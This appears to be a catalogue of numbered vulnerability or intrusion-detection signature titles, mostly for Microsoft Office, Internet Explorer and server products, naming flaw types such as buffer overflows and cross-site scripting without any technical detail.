[67711] Microsoft Excel information code execution [67710] Microsoft Excel Excel record code execution [67662] Symantec Backup Exec for Windows Servers communication man-in-the-middle [67411] Microsoft .NET Framework JIT compiler code execution [67301] Microsoft PowerPoint presentation code execution [67300] Microsoft PowerPoint presentation code execution [66991] Microsoft Internet Explorer CSS address bar spoofing [66976] HP Insight Control Performance Management for Windows unspecified cross-site requets forgery [66975] HP Insight Control Performance Management for Windows unspecified privilege escalation [66847] Microosft Windows WebDAV code execution [66729] Microsoft HTML Help CHM buffer overflow [66710] Microsoft Reader aud_file.dll code execution [66709] Microsoft Reader eBook buffer overflow [66708] Microsoft Reader msreader.exe buffer overflow [66544] A Microsoft FAX cover sheet has been detected [66435] Microsoft Internet Explorer Javascript information disclosure [66434] Microsoft Internet Explorer frame tag information disclosure [66433] Microsoft Internet Explorer layout code execution [66426] Microsoft Office DLL code execution [66393] Microsoft WordPad code execution [66137] Microsoft Source Code Analyzer for SQL injection privilge escalation [66066] Windows Movie Maker .avi buffer overflow [66064] Microsoft Internet Explorer unspecified code execution [66063] Microsoft Internet Explorer unspecified code execution [66062] Microsoft Internet Explorer unspecified code execution [66025] Microsoft Internet Explorer XSLT information disclosure [65918] Microsoft Internet Explorer address bar spoofing [65867] Microsoft Visual Studio project file buffer overflow [65626] Microsoft Malware Protection Engine privilege escalation [65587] Microsoft Excel data code execution [65586] Microsoft Excel memory record buffer overflow [65585] Microsoft Excel memory corruption code execution [65584] Microsoft Excel WriteAV code execution [65583] Microsoft Excel memory buffer overflow [65582] Microsoft Excel buffer code execution [65579] Microsoft PowerPoint persist directory code execution [65578] Microsoft PowerPoint Techno-color code execution [65572] Microsoft Office Groove DLL code execution [65192] Microsoft PowerPoint OfficeArt code execution [65191] Microsoft Office graphic code execution [65190] Microsoft Excel Axis properties code execution [65188] Microsoft Excel art object code execution [65187] Microsoft Excel object code execution [64924] Microsoft Visio data type code execution [64923] Microsoft Visio object code execution [64913] Microsoft Internet Explorer DLL code execution [64912] Microsoft Internet Explorer code execution [64911] Microsoft Internet Explorer code execution [64908] Microsoft .NET Framework JIT code execution [64903] Microsoft DirectShow DLL code execution [64571] Microsoft Internet Explorer GUI weak security [64482] Microsoft Internet Explorer ReleaseInterface() code execution [64341] Microsoft Data Access Components (MDAC) ADO record code execution [64340] Microsoft Data Access Components (MDAC) ODBC buffer overflow [64250] Microsoft WMI Administrative Tools ActiveX control (WBEMSingleView.ocx) code execution [64248] Microsoft Internet Information Services TELNET_STREAM_CONTEXT::OnSendData buffer overflow [64196] HAURI Windows Server and ViRobot Desktop VRsecos.sys privilege escalation [64083] Microsoft Foundation Class DLL code execution [64075] Windows Live Mail dynamic-linked library (dwmapi.dll) code execution [63915] Microsoft Data Access Objects (DAO) dynamic-linked library (DLL) code execution [63879] Windows Server 2008 Color Control Panel dynamic-linked library (DLL) code execution [63866] Microsoft Visio dynamic-linked library (DLL) code execution [63840] Microsoft Visual C++ 2008 Redistributable Package dynamic-linked library (DLL) code execution [63815] Microsoft Remote Desktop Protocol dynamic-linked library (ieframe.dll) code execution [63802] Microsoft Visio dynamic-linked library (dwmapi.dll) code execution [63780] Microsoft PowerPoint 2007 dynamic-linked library (rpawinet.dll) code execution [63775] Microsoft Visio 2003 dynamic-linked library (mfc71enu.dll) code execution [63749] Microsoft Internet Explorer CSS code execution [63581] Microsoft Address Book insecure library loading code execution [63572] Microsoft Exchange Server RPC denial of service [63557] Microsoft Internet Explorer information disclosure [63556] Microsoft Internet Explorer element code execution [63555] Microsoft Internet Explorer HTML element code execution [63553] Microsoft Internet Explorer object code execution [63552] Microsoft Internet Explorer script information disclosure [63551] Microsoft Internet Explorer HTML object code execution [63545] Microsoft Sharepoint SOAP code execution [63543] Microsoft Publisher array indexing memory corruption code execution [63542] Microsoft Publisher memory corruption code execution [63541] Microsoft Publisher pubconv.dll code execution [63540] Microsoft Publisher pubconv.dll buffer overflow [63539] Microsoft Publisher pubconv.dll code execution [63536] Microsoft Office FlashPix code execution [63535] Microsoft Office FlashPix buffer overflow [63534] Microsoft Office TIFF image code execution [63533] Microsoft Office TIFF image files [63532] Microsoft Office TIFF image buffer overflow [63531] Microsoft Office PICT code execution [63530] Microsoft Office CGM Image buffer overflow [63514] Microsoft Outlook file attachment denial of service [62962] Microsoft Internet Explorer invalid flag code execution [62886] HP Insight Control Performance Management for Windows unspecified privilege escalation [62885] HP Insight Control Performance Management for Windows unspecified cross-site request forgery [62884] HP Insight Control Performance Management for Windows unspecified cross-site scripting [62883] HP Insight Control Performance Management for Windows information disclosure [62864] HP Insight Recovery for Windows information disclosure [62863] HP Insight Recovery for Windows unspecified cross-site scripting [62862] HP Insight Orchestration for Windows information disclosure [62861] HP Insight Orchestration for Windows unauthorized access [62860] HP Insight Managed System Setup Wizard for Windows information disclosure [62804] Microsoft Forefront Unified Access Gateway Sginurl.asp cross-site scripting [62803] Microsoft Forefront Unified Access Gateway Mobile Portal cross-site scripting [62802] Microsoft Forefront Unified Access Gateway Web monitor cross-site scripting [62801] Microsoft Forefront Unified Access Gateway spoofing [62792] Microsoft PowerPoint underflow code execution [62791] Microsoft PowerPoint PowerPoint buffer overflow [62788] Microsoft Office DLL code execution [62787] Microsoft Office SPID code execution [62786] Microsoft Office drawing code execution [62785] Microsoft Office art drawing code execution [62784] Microsoft Office RTF buffer overflow [62783] HP Insight Control Server Migration for Windows unauthorized access [62782] HP Insight Control Server Migration for Windows unspecified privilege escalation [62781] HP Insight Control Server Migration for Windows unspecified cross-site scripting [62778] HP Insight Control Power Management for Windows unspecified cross-site request forgery [62777] HP Insight Control Power Management for Windows unspecified cross-site scripting [62728] Microsoft Internet Explorer window.onerror information disclosure [62469] Oracle Sun Products Directory Server Enterprise Edition Identity Synchronization for Windows unspecified [62259] Novell Client for Windows ActiveX control denial of service [62186] Microsoft Internet Information Services directory names code execution [62146] Microsoft .NET Framework JIT compiler code execution [62128] Microsoft Foundation Class (MFC) library title buffer overflow [62117] Microsoft Excel ghost record type parsing code execution [62116] Microsoft Excel out-of-bounds memory write in parsing code execution [62115] Microsoft Excel real time data array record code execution [62114] Microsoft Excel extra out of boundary record parsing code execution [62113] Microsoft Excel negative future function code execution [62112] Microsoft Excel merge cell record pointer code execution [62111] Microsoft Excel out of bounds array code execution [62110] Microsoft Excel formula biff record code execution [62109] Microsoft Excel formula substream memory corruption code execution [62108] Microsoft Excel Lotus 1-2-3 file parsing code execution [62107] Microsoft Excel file format parsing code execution [62106] Microsoft Excel record parsing memory corruption code execution [62105] Microsoft Excel record parsing integer overflow code execution [62097] Microsoft Word Word file code execution [62096] Microsoft Word file code execution [62095] Microsoft Word indexes code execution [62094] Microsoft Word records buffer overflow [62093] Microsoft Word pointers code execution [62090] Microsoft Internet Explorer deleted object code execution [62089] Microsoft Internet Explorer script information disclosure [62088] Microsoft Internet Explorer deleted object code execution [62087] Microsoft Internet Explorer object code execution [62086] Microsoft Internet Explorer Anchor element information disclosure [62085] Microsoft Internet Explorer deleted object code execution [62084] Microsoft Internet Explorer CSS information disclosure [62083] Microsoft Internet Explorer toStaticHTML API information disclosure [62082] Microsoft Internet Explorer AutoComplete information disclosure [62079] Microsoft Word bookmarks code execution [62078] Microsoft Word return values code execution [62077] Microsoft Word stack code execution [62076] Microsoft Word index code execution [62075] Microsoft Word boundary check code execution [62074] Microsoft Word pointer code execution [61937] Microsoft Word MSO.dll denial of service [61916] Microsoft DRM technology ActiveX control code execution [61913] Microsoft Internet Explorer toStaticHTML cross-site scripting [61898] Microsoft ASP.NET padding information disclosure [61894] Microsoft Paint BMP denial of service [61636] Microsoft Exchange Server Outlook Web Access cross-site request forgery [61516] Microsoft WordPad Word 97 code execution [61513] Microsoft Internet Information Services (IIS) URL authentication bypass [61512] Microsoft Internet Information Services request header buffer overflow [61511] Microsoft Internet Information Services repeated POST denial of service [61509] Microsoft Outlook Online Mode buffer overflow [61393] Google Chrome Windows kernel unspecified [61067] Windows Live Messenger animation denial of service [60802] Google Chrome Windows kernel unspecified [60739] Microsoft Internet Explorer frame.frameBorder denial of service [60735] Microsoft .NET Framework CLR code execution [60733] Microsoft Word HTML linked objects code execution [60732] Microsoft Word RTF buffer overflow [60731] Microsoft Word RTF code execution [60730] Microsoft Word record code execution [60727] Microsoft Excel Excel file code execution [60712] Microsoft Internet Explorer uninitialized memory corruption code execution [60711] Microsoft Internet Explorer uninitialized memory corruption code execution [60710] Microsoft Internet Explorer race condition memory corruption code execution [60709] Microsoft Internet Explorer uninitialized memory corruption code execution [60708] Microsoft Internet Explorer uninitialized memory corruption code execution [60707] Microsoft Internet Explorer mouse information disclosure [60561] Microsoft Exchange Server Outlook Web Access cross-site request forgery [60522] Microsoft Clip Organizer ActiveX control denial of service [60478] A file containing Microsoft LNK data was detected [60290] HP Insight Orchestration for Windows unauthorized access [60289] HP Virtual Connect Enterprise Manager for Windows unspecified cross-site scripting [60288] HP Insight Control Server Migration for Windows unspecified cross-site request forgery [60287] HP Insight Control Server Migration for Windows unauthorized access [60286] HP Insight Control Power Management for Windows unauthorized access [60164] Microsoft Exchange Server OWA cross-site request forgery [60156] Microsoft Word Word file code execution [59948] Microsoft Internet Explorer mshtml.dll information disclosure [59894] Microsoft Outlook SMB code execution [59889] Microsoft Office ActiveX control code execution [59768] Microsoft Internet Explorer IFRAME information disclosure [59088] Microsoft Internet Explorer nntp:// URIs denial of service [59087] Microsoft Internet Explorer news:// URIs denial of service [59069] Microsoft Internet Explorer CSS expression denial of service [59060] Microsoft ASP.NET view state cross-site scripting [59057] Microsoft ASP.NET EnableViewStateMac cross-site scripting [59055] Microsoft ASP.NET InnerHtml property cross-site scripting [58954] Microsoft Dynamics GP password security bypass [58912] Microsoft Excel Office XML privilege escalation [58911] Microsoft Excel ADO code execution [58910] Microsoft Excel string code execution [58909] Microsoft Excel stack code execution [58908] Microsoft Excel EDG code execution [58907] Microsoft Excel Excel code execution [58906] Microsoft Excel HFPicture code execution [58905] Microsoft Excel Excel file code execution [58904] Microsoft Excel RTD code execution [58903] Microsoft Excel Excel code execution [58902] Microsoft Excel format code execution [58901] Microsoft Excel chart sheet substreams code execution [58900] Microsoft Excel object buffer overflow [58899] Microsoft Excel record code execution [58890] Microsoft SharePoint help page denial of service [58870] Microsoft Internet Explorer deleted object code execution [58869] Microsoft Internet Explorer IE8 Developer Toolbar code execution [58868] Microsoft Internet Explorer HTML element code execution [58867] Microsoft Internet Explorer object code execution [58866] Microsoft Internet Explorer toStaticHTML information disclosure [58864] Microsoft Internet Information Services (IIS) authentication code execution [58862] Microsoft Office COM code execution [58835] Microsoft Outlook Web Access (OWA) id cross-site scripting [58833] Microsoft Dynamics GP cipher information disclosure [58757] Microsoft Internet Explorer IFRAME element denial of service [58506] HP Insight Control server migration for Windows cross-site scripting [58496] Microsoft Internet Explorer Invisible Hand extension information disclosure [58346] Microsoft Visio DXF buffer overflow [58170] Microsoft Visual Basic for Applications (VBA) ActiveX control buffer overflow [58044] Microsoft Internet Explorer filter cross-site scripting [57990] Microsoft Internet Explorer XML unspecified [57978] Microsoft wireless keyboard XOR weak security [57783] DWG Windows FTP Server security bypass [57581] Microsoft Office Communicator SIP INVITE denial of service [57401] Microsoft Internet Explorer data structures denial of service [57387] Apple iTunes for Windows installation privilege escalation [57373] Microsoft MPEG Layer-3 buffer overflow [57340] Microsoft Visio index code execution [57339] Microsoft Visio attributes code execution [57338] Microsoft Internet Explorer 8 Developer Tools code execution [57327] Microsoft Office PublisherTextBox buffer overflow [57307] Microsoft Internet Explorer deleted object code execution [57306] Microsoft Internet Explorer URL code execution [57305] Microsoft Internet Explorer domain information disclosure [57304] Microsoft Internet Explorer HTML object code execution [57303] Microsoft Internet Explorer HTML object code execution [57302] Microsoft Internet Explorer deleted object code execution [57301] Microsoft Internet Explorer object code execution [57300] Microsoft Internet Explorer strings information disclosure [57299] Microsoft Internet Explorer object code execution [57197] Microsoft Internet Explorer unspecified code execution [57196] Microsoft Internet Explorer base address buffer overflow [56994] Microsoft Virtual PC and Microsoft Virtual Server Virtual Machine Monitor security bypass [56856] Skype for Windows skypePM.exe file deletion [56809] Skype for Windows URI handler information disclosure [56808] Microsoft Office AccWizObjects code execution [56772] Microsoft Internet Explorer use-after-free code execution [56651] Microsoft Internet Information Services DNS cross-site scripting [56597] Microsoft Sharepoint Upload.aspx cross-site scripting [56469] Microsoft Excel DbOrParamQry code execution [56468] Microsoft Excel XLSX code execution [56467] Microsoft Excel FNGROUPNAME code execution [56466] Microsoft Excel MDXSET buffer overflow [56465] Microsoft Excel MDXTUPLE buffer overflow [56464] Microsoft Excel object type code execution [56463] Microsoft Excel record memory code execution [56460] Microsoft Movie Maker and and Microsoft Producer buffer overflow [56431] Microsoft Internet Explorer CSS stylesheets information disclosure [56241] OpenOffice.org Microsoft Word file sprmTSetBrc buffer overflow [56240] OpenOffice.org Microsoft Word file sprmTDefTable buffer overflow [56093] Microsoft Internet Explorer URLMON security bypass [55931] Microsoft Office Office files buffer overflow [55929] Microsoft DirectShow AVI file buffer overflow [55927] Microsoft Paint JPEG integer overflow [55915] Microsoft Data Analyzer ActiveX Control code execution [55900] Microsoft Internet Explorer createElement denial of service [55889] Microsoft PowerPoint ViewerTextCharsAtom buffer overflow [55888] Microsoft PowerPoint Viewer TextBytesAtom buffer overflow [55887] Microsoft PowerPoint OEPlaceholderAtom code execution [55886] Microsoft PowerPoint placementId code execution [55885] Microsoft PowerPoint LinkedSlideAtom buffer overflow [55884] Microsoft PowerPoint file path buffer overflow [55863] Microsoft Internet Explorer multiple unspecified denial of service [55817] Windows Live Messenger ActiveX Control buffer overflow [55778] Microsoft Internet Explorer object memory code execution [55777] Microsoft Internet Explorer uninitialized code execution [55776] Microsoft Internet Explorer deleted object code execution [55775] Microsoft Internet Explorer initialized memory code execution [55774] Microsoft Internet Explorer deleted object code execution [55773] Microsoft Internet Explorer URL code execution [55676] Microsoft Internet Explorer ActiveX Control code execution [55642] Microsoft Internet Explorer freed object code execution [55483] Windows Live Messenger ActiveX control ViewProfile() denial of service [55308] Microsoft Internet Information Services colon security bypass [55154] Microsoft Silverlight code execution [55031] Microsoft Internet Information Services (IIS) filenames security bypass [54935] Wireshark Windows IPMI dissector denial of service [54463] Microsoft Internet Explorer cross-site scripting filter information disclosure [54444] Microsoft WordPad and Office Text Converter Word 97 file code execution [54423] Microsoft Office Project project code execution [54421] Microsoft Internet Explorer deleted object code execution [54420] Microsoft Internet Explorer uninitialized object code execution [54418] Microsoft Internet Explorer uninitialized object code execution [54399] Microsoft Internet Explorer PDF information disclosure [54367] Microsoft Internet Explorer CSS/Style code execution [54317] Microsoft Internet Explorer setHomePage denial of service [54234] Sun Java SE Windows Pluggable Look and Feel unspecified [54011] Microsoft Excel field code execution [54010] Microsoft Excel Excel records code execution [54009] Microsoft Excel Excel formulas code execution [54008] Microsoft Excel cell code execution [54007] Microsoft Excel BIFF records buffer overflow [54006] Microsoft Excel Featheader code execution [54005] Microsoft Excel SxView code execution [54004] Microsoft Excel cache code execution [53976] Microsoft Word Word file code execution [53955] Microsoft SharePoint download feature information disclosure [53937] Sun Solaris XScreenSaver popup windows information disclosure [53601] Microsoft Office 2008 for Mac user ID 502 security bypass [53543] Microsoft Internet Explorer uninitialized object code execution [53542] Microsoft Internet Explorer uninitialized code execution [53539] Microsoft Internet Explorer arguments code execution [53538] Microsoft Internet Explorer data stream headers code execution [53532] Microsoft Office BMP image code execution [53520] Microsoft Server Message Block (SMB) Protocol software command value code execution [53519] Microsoft Server Message Block (SMB) Protocol software denial of service [53417] Microsoft Internet KEYGEN denial of service [53414] Microsoft Internet window.print denial of service [53034] Microsoft Internet Information Services (IIS) directory listings denial of service [53005] Microsoft Internet Explorer window.open() spoofing [52926] Sophos PureMessage for Microsoft Exchange anti-virus and anti-spam unspecified vulnerability [52925] Sophos PureMessage for Microsoft Exchange EdgeTransport.exe denial of service [52915] Microsoft Internet Information Services (IIS) FTP buffer overflow [52897] Microsoft Internet Explorer JavaScript code denial of service [52889] Windows File Parameter Alteration [52870] Microsoft Internet Explorer integer value denial of service [52780] Microsoft .NET Framework CLR code execution [52765] Microsoft Internet Explorer XML denial of service [52762] Microsoft Internet Explorer Unicode string denial of service [52722] Microsoft Internet Explorer DIV element denial of service [52590] Microsoft Internet Explorer JavaScript SetAttribute denial of service [52276] Solaris XScreenSaver Xorg popup windows information disclosure [52273] Windows Security Support Provider Interface credential forwarding [52249] Microsoft Internet Explorer mshtml.dll denial of service [52243] Microsoft IIS With .NET Path Disclosure [52241] Microsoft IIS servervariables_vbscript.asp Information Disclosure [52240] Microsoft IIS Sample Application Physical Path Disclosure [52238] Microsoft FrontPage Server Extensions Vital Information Leakage [52237] Microsoft FrontPage Server Extensions To Do List Found [52236] Microsoft FrontPage Server Extensions Machine Name Disclosure [52235] Microsoft FrontPage Configuration Information Leakage [52234] Microsoft FrontPage '_vti_cnf' Information Leakage [52233] Microsoft IIS With .NET Path Disclosure [52106] Microsoft Message Queuing Service (MSMQ) IOCTL privilege escalation [52105] Microsoft Office Web Components ActiveX control buffer overflow [52087] Microsoft Active Template Library (ATL) variant code execution [52052] Microsoft Internet Explorer Active Template Library (ATL) ActiveX control killbit security bypass [52051] Microsoft Internet Explorer deleted objects code execution [52050] Microsoft Internet Explorer table operations code execution [52049] Microsoft Internet Explorer memory object code execution [52048] Microsoft Active Template Library (ATL) NULL string information disclosure [52047] Microsoft Active Template Library (ATL) object code execution [52044] Microsoft Active Template Library (ATL) header code execution [51972] Windows Live Messenger Marcelo Costa FileServer directory traversal [51637] Microsoft Internet Explorer AddFavorite buffer overflow [51616] Microsoft Internet Explorer cached certificate weak security [51552] Microsoft Internet Explorer Refresh header cross-site scripting [51467] Microsoft ISA Server Radius One Time Password (OTP) privilege escalation [51464] Microsoft Virtual PC and Microsoft Virtual Server privilege escalation [51461] Microsoft DirectX DirectShow code execution [51460] Microsoft Publisher pointer dereference code execution [51458] Microsoft DirectX QuickTime code execution [51454] Microsoft Office Web Components ActiveX control buffer overflow [51452] Microsoft Office Web Components ActiveX control HTML code execution [51451] Microsoft Office Web Components ActiveX control code execution [51378] Microsoft Internet Explorer connect response weak security [51186] Microsoft Internet Explorer https security bypass [50849] ATEN KH1516i and KN9116 IP KVM switch Windows and Java client RSA cryptography weak security [50831] Microsoft DirectX quartz.dll code execution [50794] Microsoft Word Word file buffer overflow [50793] Microsoft Word Word file buffer overflow [50790] Microsoft Excel record pointer code execution [50789] Microsoft Excel record integer overflow [50788] Microsoft Excel field code execution [50787] Microsoft Excel string buffer overflow [50786] Microsoft Excel array indexing code execution [50785] Microsoft Excel object record code execution [50784] Microsoft Excel pointer code execution [50775] Microsoft Internet Explorer HTML objects code execution [50774] Microsoft Internet Explorer HTML objects code execution [50773] Microsoft Internet Explorer HTML objects code execution [50772] Microsoft Internet Explorer object access code execution [50771] Microsoft Internet Explorer HTML code execution [50770] Microsoft Internet Explorer DHTML code execution [50769] Microsoft Internet Explorer cached data cross-domain security bypass [50764] Microsoft Print Spooler service information disclosure [50756] Microsoft Office Converter buffer overflow [50633] HP System Management Homepage (SMH) for Linux and Windows unspecified cross-site scripting [50573] Microsoft Internet Information Services (IIS) WebDAV security bypass [50553] Dream Windows MaxCMS inc/ajax.asp SQL injection [50529] Apple Mac OS X Microsoft Office Spotlight Importer code execution variant 1 [50494] Microsoft Internet Explorer utf-7 encoded characters cross-site scripting [50425] Microsoft PowerPoint sound data code execution [50354] McAfee GroupShield for Microsoft Exchange X- headers security bypass [50350] Microsoft Internet Explorer unprintable characters denial of service [50280] Microsoft PowerPoint atoms or data buffer overflow [50279] Microsoft PowerPoint notes buffer overflow [50278] Microsoft PowerPoint sound data buffer overflow [50277] Microsoft PowerPoint name strings buffer overflow [50276] Microsoft PowerPoint structures buffer overflow [50275] Microsoft PowerPoint string buffer overflow [50274] Microsoft PowerPoint sound PowerPoint 95 code execution [50273] Microsoft PowerPoint BuildList record code execution [50272] Microsoft PowerPoint sound data code execution [50271] Microsoft PowerPoint sound code execution [50270] Microsoft PowerPoint record types integer overflow [50269] Microsoft PowerPoint record header buffer overflow [49888] Microsoft Intelligent Application Gateway Whale Client Components ActiveX control buffer overflow [49632] Microsoft PowerPoint index value code execution [49575] Microsoft Wordpad Word 97 buffer overflow [49573] Microsoft Office WordPerfect 6.x Converter code execution [49572] Microsoft WordPad and Office Text Converter file code execution [49567] Microsoft ISA Server and Microsoft Forefront TMG cookieauth.dll cross-site scripting [49564] Microsoft ISAServer and Microsoft Forefront TMG Web proxy TCP state denial of service [49559] Microsoft DirectShow MJPEG code execution [49557] Microsoft Internet Explorer uninitialized memory code execution [49555] Microsoft Internet Explorer deleted memory code execution [49554] Microsoft Internet Explorer uninitialized memory code execution [49552] Microsoft Internet Explorer page transition code execution [49549] Microsoft Internet Explorer WinINet code execution [49544] Microsoft Excel object code execution [49389] Microsoft Internet Explorer unspecified code execution [49176] IBM Tivoli Storage Manager HSM for Windows client buffer overflow [49109] OpenBSD and Microsoft Interix fts_build function denial of service [48875] Microsoft Excel unspecified code execution [48815] Microsoft XML Core Services HTTPOnly Set-Cookie2 HTTP response headers information disclosure [48810] Windows Live Messenger Charset denial of service [48595] Microsoft Word 2007 Email as PDF information disclosure [48576] TFTP Windows PUT request detected [48542] Microsoft Internet Explorer onclick action click hijacking [48528] IBM WebSphere Application Server JSP Windows information disclosure [48337] WOW - Web On Windows ActiveX Control WriteIniFileString code execution [48335] Microsoft Internet Explorer HTML form value denial of service [48310] Microsoft Internet Explorer Cascading Style Sheets code execution [48309] Microsoft Internet Explorer CFunctionPointer code execution [48305] Microsoft Visio memory code execution [48303] Microsoft Visio object data copy code execution [48296] Microsoft Visio object data validation code execution [48294] Microsoft .NET Framework Type check code execution [48293] Microsoft .NET Framework CAS verification code execution [48023] Windows NTP Time Server Syslog Monitor syslog message denial of service [47974] Oracle Database SQLPlus Windows GUI component local information disclosure [47973] Oracle Database SQLPlus Windows GUI component remote information disclosure [47868] Microsoft HTML Help Workshop .hhp buffer overflow [47818] Windows Live Messenger Now Playing Plugin (gen_msn) plugin for Winamp gen_msn.dll buffer overflow [47788] Microsoft Internet Explorer JavaScript onload=screen attribute denial of service [47774] Microsoft Internet Explorer Scripting.FileSystem security bypass [47756] Microsoft Money prtstb06.dll ActiveX control denial of service [47738] Microsoft MSN Messenger IP address information disclosure [47671] Microsoft Exchange Server EMSMDB2 invalid MAPI commands denial of service [47670] Microsoft Exchange Server TNEF decoding code execution [47444] Microsoft Internet Explorer XDomainRequestAllowed header XSS filter bypass [47443] Microsoft Internet Explorer Location and Set-Cookie HTTP header XSS filter bypass [47442] Microsoft Internet Explorer X-XSS-Protection HTTP header XSS filter bypass [47441] Microsoft Internet Explorer Content-Type header XSS filter bypass [47277] Microsoft Internet Explorer CSS expression property XSS filter bypass [47258] Sun Ray Server Software and Sun Ray Windows Connector LDAP security bypass [47246] Microsoft Wordpad Text Converter for Word 97 buffer overflow [47208] Microsoft Internet Explorer data binding code execution [47182] Microsoft SQL Server sp_replwritetovarbin() buffer overflow [46878] Microsoft Excel file record code execution [46863] Microsoft Excel NAME record code execution [46862] Microsoft Excel spreadsheet formula code execution [46860] Microsoft Internet Explorer embedded object code execution [46859] Microsoft Internet Explorer deleted object code execution [46858] Microsoft Internet Explorer HTML objects uninitialized memory code execution [46857] Microsoft Internet Explorer parameter validation code execution [46854] Microsoft Office SharePoint access control privilege escalation [46852] Microsoft Word document table property buffer overflow [46851] Microsoft Word RTF stylesheet control word buffer overflow [46850] Microsoft Word RTF group control word buffer overflow [46849] Microsoft Word RTF drawing object buffer overflow [46848] Microsoft Word RTF drawing object code execution [46847] Microsoft Word malformed value code execution [46846] Microsoft Word RTF polyline and polygon buffer overflow [46731] Symantec Backup Exec for Windows Servers data management protocol buffer overflow [46730] Symantec Backup Exec for Windows Servers Backup Exec Remote Agent security bypass [46695] Microsoft .NET Framework SN weak security [46673] Microsoft Communicator SIP INVITE message unspecified denial of service [46671] Microsoft Communicator emoticon unspecified denial of service [46628] Microsoft Active Directory username information disclosure [46590] Microsoft Sharepoint HTML document cross-site scripting [46309] Microsoft Debug Diagnostic Tool DebugDiag ActiveX control denial of service [46235] Microsoft Internet Explorer high-bit address bar spoofing [46234] Microsoft Internet Explorer non-breaking space address bar spoofing [46189] Microsoft Visual Basic Charts ActiveX control code execution [46187] Microsoft Visual Basic Hierarchical Flexgrid ActiveX control code execution [46183] Microsoft Visual Basic Flexgrid ActiveX control code execution [46178] Microsoft Visual Basic Datagrid ActiveX control code execution [46061] Microsoft Outlook Web Access (OWA) redir.asp phishing [45854] Microsoft Internet Explorer script origin information disclosure [45746] Cisco Unity Microsoft API unspecified denial of service [45735] Microsoft PicturePusher ActiveX control file upload [45718] Microsoft Internet Explorer Extended HTML Form cross-site scripting [45656] XAMPP for Windows cds.php and phonebook.php SQL injection [45639] Microsoft Internet Explorer alert function denial of service [45584] Microsoft IIS adsiis.dll ActiveX control denial of service [45580] Microsoft Excel REPT code execution [45579] Microsoft Excel spreadsheet BIFF file format buffer overflow [45566] Microsoft Excel calendar object code execution [45564] Microsoft Internet Explorer uninitialized memory code execution [45563] Microsoft Internet Explorer componentFromPoint() code execution [45562] Microsoft Internet Explorer event handling cross-domain security bypass [45558] Microsoft Internet Explorer HTML cross-domain security bypass [45556] Microsoft IAS Helper COM ActiveX control denial of service [45555] Microsoft XML Core Services chunked transfer-encoding headers information disclosure [45554] Microsoft XML Core Services DTD information disclosure [45546] Microsoft Office Content-Disposition cdo:// protocol cross-site scripting [45537] Microsoft Message Queuing RPC code execution [45522] XAMPP for Windows adodb.php cross-site scripting [45507] Citrix Presentation Server for Windows unspecified privilege escalation [45420] Microsoft WordPad .doc denial of service [45225] Microsoft Internet Explorer PNG file denial of service [45214] Microsoft Visio installed [45211] Microsoft Project installed [45208] Microsoft Office installed [45207] Microsoft Internet Explorer installed [45186] Microsoft SQL Server 2000 SQLVDIRLib.SQLVDirControl ActiveX control buffer overflow [45007] Apple Bonjour for Windows mDNSResponder spoofing [45005] Apple Bonjour for Windows mDNSResponder denial of service [44993] Microsoft Organization Chart code execution [44775] PureMessage for Microsoft Exchange PMScanner.exe denial of service [44743] Microsoft ASP.NET ValidateRequest &quot [44741] Microsoft ASP.NET ValidateRequest &quot [44707] Microsoft Office OneNote file Uniform Resource Locator code execution [44704] Microsoft Host Integration Server SNA RPC code execution [44629] Windows Media Services ActiveX control (nskey.dll) CallHTMLHelp() method buffer overflow [44466] Symantec VERITAS Storage Foundation for Windows VxSchedService.exe code execution [44444] Microsoft Visual Studio Masked Edit ActiveX control buffer overflow [44098] Microsoft Internet Explorer print preview argument code execution [44097] Microsoft Internet Explorer table layout code execution [44096] Microsoft Internet Explorer XHTML object code execution [44095] Microsoft Internet Explorer object access code execution [44094] Microsoft Internet Explorer uninitialized memory code execution [44093] Microsoft Internet Explorer uninitialized memory code execution [44091] Microsoft Excel COUNTRY record value code execution [44090] Microsoft Excel FORMAT array index code execution [44089] Microsoft Excel chart AxesSet array index code execution [44088] Microsoft Excel credential caching unauthorized data access [44084] Microsoft Image Color Management InternalOpenColorProfile() buffer overflow [44078] Microsoft Event System index range code execution [44077] Microsoft Event System user subscriptions code execution [44069] Microsoft PowerPoint Viewer picture array index memory calculation code execution [44066] Microsoft PowerPoint Viewer CString object integer overflow [43950] Microsoft Internet Explorer cookie dot session hijacking [43869] F-PROT Antivirus Microsoft Office file denial of service [43676] Microsoft Internet Explorer frame String security bypass [43663] Microsoft Word record parsing code execution [43627] Microsoft Crypto API Certificate Revocation List (CRL) information disclosure [43613] Microsoft Snapshot Viewer ActiveX control code execution [43467] Microsoft Internet Explorer frame Object security bypass [43460] Novell Client for Windows NWFS.SYS privilege escalation [43413] Avaya Messaging Storage Server Windows domain parameters command execution [43366] Microsoft Internet Explorer location and location.href security bypass [43354] Microsoft Office WPG image filter buffer overflow [43353] Microsoft Office BMP image filter buffer overflow [43352] Microsoft Office PICT bits_per_pixel buffer overflow [43329] Microsoft Exchange Outlook Web Access HTML cross-site scripting [43328] Microsoft Exchange Outlook Web Access email fields cross-site scripting [43180] Microsoft Visual Basic Enterprise Edition vb6stkit.dll buffer overflow [43155] Microsoft Word unordered list code execution [43062] VMware COM API for Windows ActiveX control (VmCOM.dll) GuestInfo() method buffer overflow [42899] Microsoft IIS HTTP request smuggling [42804] Microsoft Internet Explorer setRequestHeader chunk security bypass [42692] Microsoft Internet Explorer substringData() buffer overflow [42690] Microsoft PowerPoint list parsing code execution [42683] Microsoft WINS network packet source privilege escalation [42679] Microsoft Outlook Express MHTML information disclosure [42526] Stunnel Windows privilege escalation [42416] Microsoft Internet Explorer &quot [42359] Novell Client for Windows username buffer overflow [42338] Microsoft Internet Explorer res:// URI info disclosure [42307] Microsoft Internet Explorer DisableCachingOfSSLPages weak security [42301] Microsoft OWA (Outlook Web Access) no-store information disclosure [42232] Microsoft Internet Explorer ActiveX string concatenation denial of service [42108] Microsoft Malware Protection Engine data structure denial of service [42107] Microsoft Malware Protection Engine file denial of service [42102] Microsoft Publisher object handler code execution [42100] Microsoft Word malformed CSS code execution [42099] Microsoft Word .rtf string code execution [41940] Microsoft HeartbeatCtl ActiveX control buffer overflow [41934] Microsoft SharePoint Services Picture Source cross-site scripting [41876] Microsoft Works ActiveX control (WkImgSrv.dll) code execution [41826] Microsoft Visual InterDev .SLN file Project line buffer overflow [41476] Microsoft Internet Explorer data stream code execution [41464] Microsoft Internet Explorer hxvz.dll object code execution [41462] Microsoft SQL Server memory INSERT statement buffer overflow [41461] Microsoft SQL Server stored backup file data structure buffer overflow [41460] Microsoft SQL Server convert() buffer overflow [41459] Microsoft SQL Server memory page reuse information disclosure [41452] Microsoft Visio 